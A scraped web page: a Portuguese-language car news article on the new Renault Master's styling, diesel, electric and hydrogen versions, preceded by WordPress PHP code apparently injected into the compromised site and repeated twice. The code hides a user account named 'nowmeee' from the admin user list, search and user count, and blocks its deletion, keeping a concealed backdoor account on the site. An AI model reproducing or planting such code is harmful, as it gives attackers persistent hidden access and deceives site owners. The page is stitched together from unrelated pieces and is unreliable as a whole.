add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'nowmeee') { wp_die( __('User nowmeee tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; });add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'nowmeee') { wp_die( __('User nowmeee tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'nowmeee'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; }); Renault Master ganha novo visual e células de hidrogênio; veja os detalhes - Revista Carro
Ícone do siteÍcone do site Revista Carro

Renault Master ganha novo visual e células de hidrogênio; veja os detalhes

Modelo também terá motor diesel de até 170 cv e uma versão 100% elétrica com propulsor de até 143 cv

Foto: Renault/Divulgação

Na Europa, a Renault mostrou imagens e detalhes técnicos da nova Master. Por lá, o modelo terá células de hidrogênio, motor elétrico de até 143 cv e, também, propulsores a diesel de até 170 cv. O utilitário deve ser vendido no segundo trimestre do próximo ano, mas ainda não há informações de quando chegará ao mercado brasileiro.

Foto: Renault/Divulgação

Visualmente, a nova Renault Master adota o mesmo padrão visual de faróis afilados do Megane elétrico já vendido no Brasil. A dianteira ainda traz uma ampla grade frontal e logomarca da montadora francesa. A traseira tem grandes lanternas na vertical e com assinatura luminosa futurista. Por dentro, pode contar com painel de instrumentos digital ou analógico a depender da versão. Inclusive, a marca disse que a Master terá 40 configurações, quando chegar ao mercado global. Já a multimídia é ampla e do estilo flutuante com conexão com smartphone.

Foto: Renault/Divulgação

Sob o capô, a nova Renault Master terá opção de motor diesel chamado de Blue dCi, que pode entregar 105, 130, 150 ou 170 cv a depender da versão. Já as opções elétricas terão opção de 130 ou 143 cv com 30,6 kgfm de torque. A bateria pode ser de 40 kWh, o que confere uma autonomia de até 180 km, ou de 87 kWh, o que permite rodar até 410 km. A marca disse apenas que essa versão terá uma célula de combustível de hidrogênio, mas não deu detalhes.

Foto: Renault/Divulgação

A nova Renault Master terá capacidade de carga útil de até 1.625 kg e 2,5 toneladas de capacidade de reboque.

Sair da versão mobile